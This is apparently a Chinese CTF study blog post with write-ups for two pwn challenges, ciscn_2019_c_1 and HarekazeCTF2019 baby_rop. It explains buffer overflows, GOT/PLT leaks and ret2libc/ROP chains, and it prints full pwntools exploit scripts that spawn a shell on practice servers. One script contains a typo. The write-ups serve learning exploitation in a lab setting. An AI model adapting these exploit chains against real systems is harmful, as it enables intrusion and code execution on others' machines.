pwn刷题笔记(ret2libc、ROP)
ciscn_2019_c_1 (ret2libc + rop)
checksec查看保护机制,开启了NX,不能往栈里写入shellcode。
encrypt函数反汇编
encrypt(){
char s[50];
puts(Input your Plaintext to be encrypted)
gets(s);
if strlen(strlen(s) < x )
{
puts("ciphertext")
puts(s)
return 0;
}
else 做加密
}
encrypt函数,如果输入的字符串大小小于x(x是运行过程中才赋值的),那么就退出。否则encrypt就会做一系列的加密操作,更改输入的字符。绕过加密,只需输入的第一个字符为'\0'即可。
可以发现在encrypt函数存在缓冲区溢出漏洞,但是开启了NX,考虑ROP。
ida查看字串,没有"system"和'/bin/sh',说明程序没有调用system函数。
再看.plt段,也没有system,但存在puts函数的.plt项。
没有libc文件,需要获取libc版本
利用思路如下:函数执行过程中获取到puts函数真实地址后,根据puts函数真实地址相对于在libc的偏移,计算出system函数和‘/bin/sh’字符串的真实地址,用到如下知识点:
libc.so 动态链接库中的函数之间相对偏移是固定的。
每个函数从libc映射到真实地址的偏移都是相等的。
先回顾下plt和got的知识
延迟绑定机制:函数在第一次执行时才去寻找真实地址
got表保存程序运行时的真实地址,plt实现延迟绑定。
程序调用函数时,plt表先去找got表,看got表用没有记录函数真实地址。如果没有,plt去公共plt调用_dl_runtime_resolve 函数获取函数地址,并保存在got表中。
plt表对应的是一系列指令;初始时,got表中存放的是plt下一条指令的地址
整理漏洞利用所需条件:
输入第一个字符为'\0'
puts函数在程序执行过程中的真实地址
puts函数真实地址相对于在libc.so的偏移
第一次栈溢出获取puts的真实地址,并计算出system和‘/bin/sh’的真实地址
第二次栈溢出执行system('/bin/sh')
第一次栈溢出:控制程序执行如下操作
通过puts@plt表查找puts函数真实地址,并存放在got表中:puts_plt(puts_got);
回到main函数,为第二次溢出做准备。
因此payload需要控制栈结构如下:
使用ROPgadget命令获取pop edi;ret的gadget,地址为:0x0000000000400c83
main函数地址为0x0000000000400B28
为什么pop edi
不同于ELF x86使用栈传递参数的方式,ELF x64参数使用寄存器传递,多余的参数才使用栈传递。
前六个整数类型参数分别存放在:rdi, rsi, rdx, rcx, r8, r9
前八个浮点数类型参数分别存放在:xxm0 - xxm7
第二次栈溢出控制程序执行system('/bin/sh')
payload需要控制栈结构如下:
添加ret指令是为了使栈平衡(16字节对齐):https://blog.csdn.net/qq_41560595/article/details/112161243
#!/usr/bin/env python3
from LibcSearcher import *
from pwn import *
elf = ELF("./ciscn_2019_c_1")
rdi_gadget = 0x400c83
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main_ad = 0x400B28
#io = process("./ciscn_2019_c_1") #本地打
io = remote("node4.buuoj.cn", 26297) #远程打
#第一次溢出
io.sendlineafter("choice!\n", b"1") #选择第一个选项
payload = b'\0' + b'a' * 0x4F + p64(0x1234) + p64(rdi_gadget) +p64(puts_got) + p64(puts_plt) + p64(main_ad)
io.sendlineafter("Input your Plaintext to be encrypted\n", payload)
print(io.recvline()) #接收encrypt函数第一个puts
print(io.recvline()) #接收encrypt函数第二个puts
rec = io.recvuntil('\n') #接收plt表执行结果
puts_addr = hex(u64(rec[:-1].decode("latin-1").encode().ljust(8,b'\x00'))) #recv接收到的是字节对象,python3中,在使用u64之前,先将字节对象解码为unicode字符串,再编码为字节序列
print(puts_addr)
libc = LibcSearcher("puts", puts_addr) #获取libc版本
offset = puts_addr - libc.dump('puts') #计算puts函数从libc.so映射到真实地址的偏移
system_addr = offset + libc.dump('system') #根据偏移计算处system函数真实地址
binsh_addr = offset + libc.dump('str_bin_sh')
print(f'offset:{offset} system_address:{system_addr} binsh_address:{binsh_addr}')
#第二次溢出
ret_gadget = 0x4006b9
io.senlineafter("choice!\n", b'1')
payload = b'\0' + b'a' * 0x4F + p64(0x1234) + p64(ret_gadget) + p64(rdi_gadget) + p64(binsh_addr) + p64(system_addr)
io.sendlineafter("be encrypted\n", payload)
io.interactive()
[HarekazeCTF2019]baby_rop
checksec查看保护机制,开启了NX。
ida查看汇编代码
写出对应反汇编代码
char input[0x10];
system("echo -n \"What's your name? \"");
scanf("%s", &input);
printf(""Welcome to the Pwn World, %s!\n"", input)
存在缓冲区溢出,且开启了NX,使用ROP。
由ida可知,“/bin/sh”地址:0x601048; system plt地址:0x400490
ROPgadget得到pop rdi指令地址:0x400683
构造栈如下:
写出利用代码
#!/usr/bin/env python3
from pwn import *
system_addr = 0x400490
binsh_addr = 0x601048
rdi_gadget = 0x400683
io = remote("node4.buuoj.cn", 29985)
payload = b'a' * 16 + p64(0x1234) + p64(rdi_gadget) + p64(binsh_addr) + p64(system_addr)
io.sendlineafter("What's your name? ", payload)
io.interactive()
原文地址:https://www.cnblogs.com/jimmy-hwang/p/17358186.html
- windows API 开发飞机订票系统 图形化界面 (四)
- windows API 开发飞机订票系统 图形化界面 (三)
- windows API 开发飞机订票系统 图形化界面 (二)
- SQL SERVER几种数据迁移/导出导入的实践
- dom4j 使用总结
- 快速对表的某字段赋递增的数值
- SQL SERVER修改函数名引起的问题
- SQL Server安全(1/11):SQL Server安全概述
- SQL Server安全(2/11):身份验证(Authentication)
- SQL Server安全(3/11):主体和安全对象(Principals and Securables)
- 在SQL Server里如何进行页级别的恢复
- 你可能不知道的字符比较中的“秘密”
- c++实现简单计算器
- re模块(正则表达式)
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 试题 基础练习 高精度加法
- C# devExpress GridControl 行中行 子行 多级行
- 蓝桥杯 试题 基础练习 Huffuman树
- 蓝桥杯 试题 基础练习 2n皇后问题(包含n皇后问题讲解)
- 蓝桥杯 试题 基础练习 报时助手
- 蓝桥杯 试题 基础练习 回形取数
- 了解RefreshScope这篇短文就够了
- Educational Codeforces Round 83 (Rated for Div. 2) A~~E
- Codeforces Round #627 (Div. 3) 题解
- 牛客练习赛59 A~~D
- Codeforces Round #628 (Div. 2) A~~D
- AtCoder Beginner Contest 160 A ~ E
- SwiftUI:创建底部导航栏 tabBar
- AtCoder Beginner Contest 168 C
- 关于 Executor 和 ExecutorService